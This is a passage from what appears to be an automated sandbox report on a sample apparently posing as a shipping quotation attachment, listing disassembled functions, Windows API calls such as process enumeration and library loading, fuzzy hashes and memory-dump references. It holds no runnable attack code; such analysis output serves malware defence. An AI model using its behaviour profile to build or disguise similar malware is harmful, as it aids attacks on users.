                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 420147892-0
                                                                            • Opcode ID: 7b1ee9d9f7e65b9a785900981309918f365e15062296cd6e17c8409fa170c310
                                                                            • Instruction ID: 0c62877ac727f90b9f425b1d1a7abaa1f92e57b3017ec42716e35c8c8d268e7f
                                                                            • Opcode Fuzzy Hash: 7b1ee9d9f7e65b9a785900981309918f365e15062296cd6e17c8409fa170c310
                                                                            • Instruction Fuzzy Hash: DE3191711083009FD704EF64C881AAFBBFAEF99354F14092DF585862A1EB719945CBA2
                                                                            Function 006C8FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00649BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00649BB2
                                                                            • GetCursorPos.USER32(?), ref: 006C9001
                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00687711,?,?,?,?,?), ref: 006C9016
                                                                            • GetCursorPos.USER32(?), ref: 006C905E
                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00687711,?,?,?), ref: 006C9094
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                            • String ID:
                                                                            • API String ID: 2864067406-0
                                                                            • Opcode ID: c5654d1e9915a90e8e84ce680eff033cd8fe5d2bcb781c9e5fbf63ac623d4235
                                                                            • Instruction ID: cbb38f339da12a5e0654f20eebf1125b9de5848bdabaf6def3440c7910ce67d6
                                                                            • Opcode Fuzzy Hash: c5654d1e9915a90e8e84ce680eff033cd8fe5d2bcb781c9e5fbf63ac623d4235
                                                                            • Instruction Fuzzy Hash: 0D217F35700018EFDB298F94CC58FFA7BBAEB49360F54416EF905472A1C735A990DB64
                                                                            Function 0069D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileAttributesW.KERNEL32(?,006CCB68), ref: 0069D2FB
                                                                            • GetLastError.KERNEL32 ref: 0069D30A
                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0069D319
                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,006CCB68), ref: 0069D376
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 2267087916-0
                                                                            • Opcode ID: a2bc62ac0fbbac20424b3d7dce7c890866814d1551247635ecee17fe765c5f34
                                                                            • Instruction ID: 639717a9147df753f53040040a1986aba3f59cb99fc3812e6c85d3d7c515ace7
                                                                            • Opcode Fuzzy Hash: a2bc62ac0fbbac20424b3d7dce7c890866814d1551247635ecee17fe765c5f34
                                                                            • Instruction Fuzzy Hash: 8721A170508201DFCB00DF28C8818AAB7EAEF56365F104A2DF499C37A1DB30DA46CB97
                                                                            Function 006C2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 006C280A
                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 006C2824
                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 006C2832
                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 006C2840
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long$AttributesLayered
                                                                            • String ID:
                                                                            • API String ID: 2169480361-0
                                                                            • Opcode ID: 6f6819161e7faf5ebf6bec1548fb94661d1199945b6f22816745b3dcd7d2b8d5
                                                                            • Instruction ID: bb31afaca98f3e41a89463103e69a8f9d47fedbc962428dcc1f76481526ef4e7
                                                                            • Opcode Fuzzy Hash: 6f6819161e7faf5ebf6bec1548fb94661d1199945b6f22816745b3dcd7d2b8d5
                                                                            • Instruction Fuzzy Hash: B9219235205512AFD7149B24C865FBA7796EF45324F14815CF8168B692C771EC42C7D0
                                                                            Function 006978F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00698D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0069790A,?,000000FF,?,00698754,00000000,?,0000001C,?,?), ref: 00698D8C
                                                                              • Part of subcall function 00698D7D: lstrcpyW.KERNEL32(00000000,?,?,0069790A,?,000000FF,?,00698754,00000000,?,0000001C,?,?,00000000), ref: 00698DB2
                                                                              • Part of subcall function 00698D7D: lstrcmpiW.KERNEL32(00000000,?,0069790A,?,000000FF,?,00698754,00000000,?,0000001C,?,?), ref: 00698DE3
                                                                            • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00698754,00000000,?,0000001C,?,?,00000000), ref: 00697923
                                                                            • lstrcpyW.KERNEL32(00000000,?,?,00698754,00000000,?,0000001C,?,?,00000000), ref: 00697949
                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,00698754,00000000,?,0000001C,?,?,00000000), ref: 00697984
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: lstrcmpilstrcpylstrlen
                                                                            • String ID: cdecl
                                                                            • API String ID: 4031866154-3896280584
                                                                            • Opcode ID: e986832308c2afdccefff658bca9e2adb53c494f7abbb74f158944d16912f701
                                                                            • Instruction ID: 8f03e6aca095d5c01b0a4d8a84c1451435b0ccff24bcf6c6eb2c1294f97546e9
                                                                            • Opcode Fuzzy Hash: e986832308c2afdccefff658bca9e2adb53c494f7abbb74f158944d16912f701
                                                                            • Instruction Fuzzy Hash: 6511033A200202AFCF159F35D844EBA77AAFF85360B10402AF906CB7A4EF319801C7A5
                                                                            Function 006C7CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 006C7D0B
                                                                            • SetWindowLongW.USER32(00000000,000000F0,?), ref: 006C7D2A
                                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 006C7D42
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,006AB7AD,00000000), ref: 006C7D6B
                                                                              • Part of subcall function 00649BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00649BB2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long
                                                                            • String ID:
                                                                            • API String ID: 847901565-0
                                                                            • Opcode ID: ad35474a96b5062fbdb35f1a691073ce523b39345ad5fd8c659dd966aeb4f09c
                                                                            • Instruction ID: 54b312662a7612d43378284b3ba3380465d460bdbc265477f8246858dee7fefe
                                                                            • Opcode Fuzzy Hash: ad35474a96b5062fbdb35f1a691073ce523b39345ad5fd8c659dd966aeb4f09c
                                                                            • Instruction Fuzzy Hash: 3C118C32614655AFCB109F28DC04EB63BA6EF45370F558728F83AC72E0D730A961DB90
                                                                            Function 0066CDBD Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0066CDC6
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0066CDE9
                                                                              • Part of subcall function 00663820: RtlAllocateHeap.NTDLL(00000000,?,00701444,?,0064FDF5,?,?,0063A976,00000010,00701440,006313FC,?,006313C6,?,00631129), ref: 00663852
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0066CE0F
                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0066CE31
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
                                                                            • String ID:
                                                                            • API String ID: 1794362364-0
                                                                            • Opcode ID: 9cb36099e04a285998dd546cde874fe18ba5bb4fa82dd35526f483d22d5c62eb
                                                                            • Instruction ID: 8965ddd50685a5e5d0822dcc8c8c9444b6dc19ae2706a29c1f2dba52a137a14c
                                                                            • Opcode Fuzzy Hash: 9cb36099e04a285998dd546cde874fe18ba5bb4fa82dd35526f483d22d5c62eb
                                                                            • Instruction Fuzzy Hash: 0A018872A01A157FA32116BA6C58DBB797FDEC6FB1315012DF949C7201DA668D0281F4
                                                                            Function 00691A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00691A47
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00691A59
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00691A6F
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00691A8A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: 17f2492dc20011e2646104aa48a51df9b056783ed28f43a4d678aaf7b3ae3d4b
                                                                            • Instruction ID: df7bbced1836e92c159f173554a0d94e1a1284533df4278c5c87ab9fb666add4
                                                                            • Opcode Fuzzy Hash: 17f2492dc20011e2646104aa48a51df9b056783ed28f43a4d678aaf7b3ae3d4b
                                                                            • Instruction Fuzzy Hash: 0B11393AD01219FFEF10DBA5CD85FADBB79EB08750F200092EA04BB290D6716E50DB94
                                                                            Function 0069E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0069E1FD
                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 0069E230
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0069E246
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0069E24D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                            • String ID:
                                                                            • API String ID: 2880819207-0
                                                                            • Opcode ID: e1927cc3fcb55f997a43d8d0c19f40d361d1e03eafd804ecad46b26f9fa104d5
                                                                            • Instruction ID: 44639a6c9b6a52a9a07c320557524417e7e9b21d6829089766f9506911fa167c
                                                                            • Opcode Fuzzy Hash: e1927cc3fcb55f997a43d8d0c19f40d361d1e03eafd804ecad46b26f9fa104d5
                                                                            • Instruction Fuzzy Hash: 5211C876D04254BBCB01DBA89C05EAE7FAEEB45720F148355F918D3791D6758A0487A0
                                                                            Function 006C9EF3 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00649BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00649BB2
                                                                            • GetClientRect.USER32(?,?), ref: 006C9F31
                                                                            • GetCursorPos.USER32(?), ref: 006C9F3B
                                                                            • ScreenToClient.USER32(?,?), ref: 006C9F46
                                                                            • DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 006C9F7A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                                            • String ID:
                                                                            • API String ID: 4127811313-0
                                                                            • Opcode ID: 459ea5934c16ca5e6479e2bd1e9199c76e25f5f51fd54419cca820e2e2a766eb
                                                                            • Instruction ID: da9ea02ae4b993dc686c1fca3ca1a6bdeb38c7c4922a65c6eb0d7d45e160c1e0
                                                                            • Opcode Fuzzy Hash: 459ea5934c16ca5e6479e2bd1e9199c76e25f5f51fd54419cca820e2e2a766eb
                                                                            • Instruction Fuzzy Hash: 6611363290011AEBDB00DF68D889EFE77BAEB05311F404459F921E3240D730BA91CBB5
                                                                            Function 0063600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0063604C
                                                                            • GetStockObject.GDI32(00000011), ref: 00636060
                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 0063606A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CreateMessageObjectSendStockWindow
                                                                            • String ID:
                                                                            • API String ID: 3970641297-0
                                                                            • Opcode ID: 22d868d87838e815f40d9a4fd2e072e497fd46863d0c13929cf8e3d569dcd5a6
                                                                            • Instruction ID: b82571a5633ad5b6fb7374eff7245520138f15a4a67ecc7b73126bacef2b43ac
                                                                            • Opcode Fuzzy Hash: 22d868d87838e815f40d9a4fd2e072e497fd46863d0c13929cf8e3d569dcd5a6
                                                                            • Instruction Fuzzy Hash: 18116D72501548BFEF164FA4DD55EEABB6AEF093A4F048215FA1892120D732DC60DBE0
                                                                            Function 00663073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,006313C6,00000000,00000000,?,0066301A,006313C6,00000000,00000000,00000000,?,0066328B,00000006,FlsSetValue), ref: 006630A5
                                                                            • GetLastError.KERNEL32(?,0066301A,006313C6,00000000,00000000,00000000,?,0066328B,00000006,FlsSetValue,006D2290,FlsSetValue,00000000,00000364,?,00662E46), ref: 006630B1
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0066301A,006313C6,00000000,00000000,00000000,?,0066328B,00000006,FlsSetValue,006D2290,FlsSetValue,00000000), ref: 006630BF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad$ErrorLast
                                                                            • String ID:
                                                                            • API String ID: 3177248105-0
                                                                            • Opcode ID: c6a68721d3ec55945a7a540867025a4a9855a1a7a589472799025ddb1c0dbd05
                                                                            • Instruction ID: 0331e0787199c7ded4003926d6badbf728022dd5629928a27caf5e97aa427399
                                                                            • Opcode Fuzzy Hash: c6a68721d3ec55945a7a540867025a4a9855a1a7a589472799025ddb1c0dbd05
                                                                            • Instruction Fuzzy Hash: 3501FC32701332ABC7314B79DC44DA7779AEF05771B100620F919D7340C725D905C6E0
                                                                            Function 00697464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0069747F
                                                                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00697497
                                                                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 006974AC
                                                                            • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 006974CA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Type$Register$FileLoadModuleNameUser
                                                                            • String ID:
                                                                            • API String ID: 1352324309-0
                                                                            • Opcode ID: da6cb6ce8b342b0bcedf57f7a101a7796a34c4a1fa854895810384e29909a2fb
                                                                            • Instruction ID: f60bd8de987819791b7e2f7cbb16917c5270a06dba5adf4285bc4bb142516525
                                                                            • Opcode Fuzzy Hash: da6cb6ce8b342b0bcedf57f7a101a7796a34c4a1fa854895810384e29909a2fb
                                                                            • Instruction Fuzzy Hash: D911ADB1215314ABEB20CF14DC08FA67BFEEF00B10F108569E61AD7992D7B0E904DBA0
                                                                            Function 0069B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0069ACD3,?,00008000), ref: 0069B0C4
                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0069ACD3,?,00008000), ref: 0069B0E9
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0069ACD3,?,00008000), ref: 0069B0F3
                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0069ACD3,?,00008000), ref: 0069B126
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CounterPerformanceQuerySleep
                                                                            • String ID:
                                                                            • API String ID: 2875609808-0
                                                                            • Opcode ID: c5409030c8754579a50f5e76375eb269dcbf263bdd25dc1e6372f842508684c4
                                                                            • Instruction ID: 7b22d7cf5fb1bab59b3c5003a08adfbabe1da4c3c2dfab76025a0ff40d920887
                                                                            • Opcode Fuzzy Hash: c5409030c8754579a50f5e76375eb269dcbf263bdd25dc1e6372f842508684c4
                                                                            • Instruction Fuzzy Hash: 0F115E31C0152DD7CF009FE5EA68AFEBB79FF4A711F115095D941B2641CB3055518B51
                                                                            Function 006C7E14 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 006C7E33
                                                                            • ScreenToClient.USER32(?,?), ref: 006C7E4B
                                                                            • ScreenToClient.USER32(?,?), ref: 006C7E6F
                                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 006C7E8A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                                            • String ID:
                                                                            • API String ID: 357397906-0
                                                                            • Opcode ID: 2d8f70bc439d67935c024b768bccf77f0f9d0891db6aa24b1621aa2a989e2dc9
                                                                            • Instruction ID: 23e8e250ace2701840d190f673c2a3383ce73c1ad4f15d1d8ad7386d5e59c685
                                                                            • Opcode Fuzzy Hash: 2d8f70bc439d67935c024b768bccf77f0f9d0891db6aa24b1621aa2a989e2dc9
                                                                            • Instruction Fuzzy Hash: 331156B9D0020AAFDB41CF99C984AEEBBF5FF18310F505056E915E3210D735AA55CF50
                                                                            Function 006501F8 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(0070070C,?,?,00648747,00702514), ref: 00650202
